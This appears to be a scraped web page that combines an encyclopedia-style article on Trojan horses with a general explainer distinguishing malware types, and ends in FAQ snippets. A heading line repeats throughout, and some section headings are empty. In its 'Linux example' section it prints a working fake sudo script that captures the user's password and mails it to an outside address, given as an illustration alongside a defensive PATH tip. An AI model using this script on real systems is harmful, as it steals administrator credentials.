● define malware and distinguish between a virus a worm and a trojan horse

In computing, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy.[1][2][3][4][5]

Trojans generally spread by some form of social engineering; for example, where a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer.[6] Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.[7]

Use of the term[edit]

It's not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both:[8]

Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other’s files.

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems.[9]

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust",[10] subtitled: To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software. He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.[11][12]

Behavior[edit]

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action.[13]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.[14][15] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer[16] and the German "state Trojan" nicknamed R2D2.[14] German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.[17]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.[18] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.[19]

Linux example[edit]

A Trojan horse is a program that purports to perform some obvious function, yet upon execution it compromises the user's security.[20] One easy program is a new version of the Linux sudo command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the Trojan horse might be executed. Here is a working version:

:
# sudo
# ----

# Turn off the character echo to the screen.
stty -echo

/bin/echo -n "Password for `whoami`: "
read x
/bin/echo ""

# Turn back on the character echo.
stty echo

echo $x | mail -s "`whoami` password" [email protected]
sleep 1
echo Sorry.
rm $0

exit 0

To prevent a command-line based Trojan horse, set the . entry in the PATH= environment variable to be located at the tail end. For example: PATH=/usr/local/bin:/usr/bin:..

Notable examples[edit]

Private and governmental[edit]

Publicly available[edit]

Detected by security researchers[edit]

Capitalization[edit]

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.[31][32]

Computers (in all shapes and sizes) have become crucial to our lives. All our work, information, and critical services now run through computer systems. That makes them a target for all sorts of malicious software.

However, not every piece of nasty code is the same. There’s a huge variety of digital diseases out there, which makes it important to know the difference between a virus, trojan, worm, rootkit, and more.

Table of Contents

● define malware and distinguish between a virus a worm and a trojan horse

What’s Malware?

Let’s start by identifying the umbrella term which covers all of the malicious software types listed below — malware.

As you’ve probably guessed, the word is just the fusion of “malicious” and “software”. It covers any type of program written to harm you, your computer, or a third-party entity via your computer.

What’s a Virus?

A virus is the most basic and well-known type of malicious software. Viruses operate in a particular way that sets them apart from other types of malware. 

First, viruses infect other programs. They insert their code into another program with the hope that it will be executed when someone runs the legitimate program. Secondly, viruses self-replicate by infecting other programs they find on a computer. 

● define malware and distinguish between a virus a worm and a trojan horse

Apart from trying to spread to other programs, viruses also have a payload. The payload can be anything the virus author wants it to be. Some viruses have benign payloads that don’t actually damage anything. The majority of viruses do harm your data or system on purpose by deleting data, stealing it, or otherwise doing something that’s not good for you or your PC.

What’s a Worm?

Computer worms and viruses are very similar in the sense that they self-replicate and execute a (usually) malicious payload on computer systems. Where they differ is in how they spread. A virus needs a host program to infect and relies on users to spread that infected program using removable storage, email, or another similar transmission method.

A worm exists as its own independent program, not as code attached to a third-party application. They also spread by themselves, without human intervention. For example, the Blaster Worm spread like wildfire in the mid-2000s thanks to a vulnerable open network port on Windows computers.

● define malware and distinguish between a virus a worm and a trojan horse

So if one computer at a company or school became infected, the program could quickly spread itself to other connected machines. Worms usually use vulnerabilities discovered in operating systems, hardware, or software to run their code without the user having to do anything at all.

These days, firewalls and other network security systems are highly effective at stopping worms from spreading, but new holes are always being discovered.

What’s a Trojan?

Trojans are named after the Trojan Horse of Greek mythology. In the original story, the people of Troy wheeled a giant wooden horse statue into the city, thinking it was a goodbye present from their enemies. Unfortunately, it turned out to be the worst piñata ever, filled with Greek soldiers who snuck out at night and opened the city gates for the rest of their army.

Computer trojans work in exactly the same way, except instead of a big horse you’ll get a program that says it’s something useful and harmless. In reality, behind the scenes, it’s doing malicious things. Unlike viruses or worms, trojans don’t usually try to infect other software or replicate themselves. Instead, they tend to install other malware on your system and call back to their creator, handing over control of your computer to the trojan’s author.

● define malware and distinguish between a virus a worm and a trojan horse

Trojans usually spread through “social engineering”, a hacker technique that relies on common weaknesses in human psychology to fool users into doing something. In this case, the “something” is opening a program because you think it’s something cool. 

What’s a Rootkit?

Rootkits are probably the most dangerous form of malware in existence. It’s not one piece of malware, but a collection (hence “kit”) of applications that are installed on a system. Together these applications take over control of the computer at a low level. A “low level” means at the level of the operating system itself, letting the creator of the rootkit do absolutely anything they’d like to the computer system and its data.

● define malware and distinguish between a virus a worm and a trojan horse

One of the reasons that rootkits are so dangerous is how hard they are to detect. Since the rootkit is at least as powerful as the operating system itself, antimalware software can be fended off with little effort. After all, the rootkit has more authority than any other application on the system. Rootkit detection and removal usually involves using a specialized bootable USB drive that prevents the installed operating system from loading in the first place before it scrubs the rootkit clean.

What’s Adware?

Adware includes any software that displays advertising to the user, but in the context of malware, those adverts are unwanted. While Adware by itself is generally not harmful, malicious adware installs itself without your consent and can negatively affect your browsing experience and computer performance.

Adware can make its way onto your computer in various ways. Ad-supported software that’s open and upfront about it is technically adware, but not malware. Other software that’s not malicious can sometimes be sneaky about including adware in their installers.

● define malware and distinguish between a virus a worm and a trojan horse

They use an “opt-out” approach where the default installation includes pre-ticked tick boxes to install adware, Most users just power through installation wizards without reading anything. Thus they unintentionally give the adware permission to install.

In worst-case scenarios, you’ll be seeing a deluge of popups from your browser and have your web browsing redirected to predatory websites. Dedicated software such as AdAware is usually best for tackling adware in particular.

What’s Spyware?

Unlike other types of malware, Spyware generally avoids doing anything to your system that you’d notice. Instead, spyware exists to monitor what you do and then send that information back to the spyware author.

That can include all sorts of information. For example, the spyware might take screenshots of documents you’re working on. That’s a function those engaged in espionage are likely to want. Spyware deployed by criminals usually captures information for financial gain. For example, keyloggers save your keystrokes to a text file. When you type in the address of something like a banking website and then type in your username and password, the keylogger captures that information and sends it back home.

● define malware and distinguish between a virus a worm and a trojan horse

Spyware can also refer to legitimate software that contains functionality the user is unaware of where user behavior or information is sent back to the developers. In most countries this type of data gathering has to be disclosed, so read your user agreements carefully!

Trojans can install spyware on your system as part of their payload and Rootkits are at least partially a type of spyware themselves.

What’s Ransomware?

Ransomware is a particularly nasty type of malware that doesn’t destroy your data but locks it behind strong encryption. Following this, the creators of the malware demand a ransom from you in order to get your data back. 

● define malware and distinguish between a virus a worm and a trojan horse

This works because strong encryption is virtually impossible to break. So unless you pay the ransom amount, your data is effectively gone. However, you should never actually pay money to ransomware creators. First, you aren’t guaranteed to regain access to your data. Secondly, you’re emboldening them to keep victimizing people. The best way to deal with Ransomware is to proactively backup and protect your data in places the malware can’t reach it.

Protecting Yourself From Malware

It can be scary to read about all the different types of computer nasties that might infect your personal devices, but you aren’t powerless against them either. Your next step is to check out How to Protect Your Computer from Hackers, Spyware and Viruses. 

In that article, you’ll learn how to proactively prevent infection in the first place and how to deal with the situation when the worst actually does happen.

What is the difference between malware computer virus Trojans and worms?

Virus is a computer program or software that connect itself to another software or computer program to harm computer system. ... Difference between Virus, Worm and Trojan Horse:.

What is malware distinguish between virus and worm?

Malware refers to all code and applications written to harm devices or the people who use them. Malware is a broad category that includes spyware, adware, ransomware, and several other types. Viruses and worms are two distinct types of malware, but both can spread rapidly.

What is the difference between a virus and worm and a worm?

Virus vs Worm The primary difference between a virus and a worm is that viruses must be triggered by the activation of their host; whereas worms are stand-alone malicious programs that can self-replicate and propagate independently as soon as they have breached the system.

What is computer malware?

As software designed to interfere with a computer's normal functioning, malware is a blanket term for viruses, trojans, and other destructive computer programs threat actors use to infect systems and networks in order to gain access to sensitive information.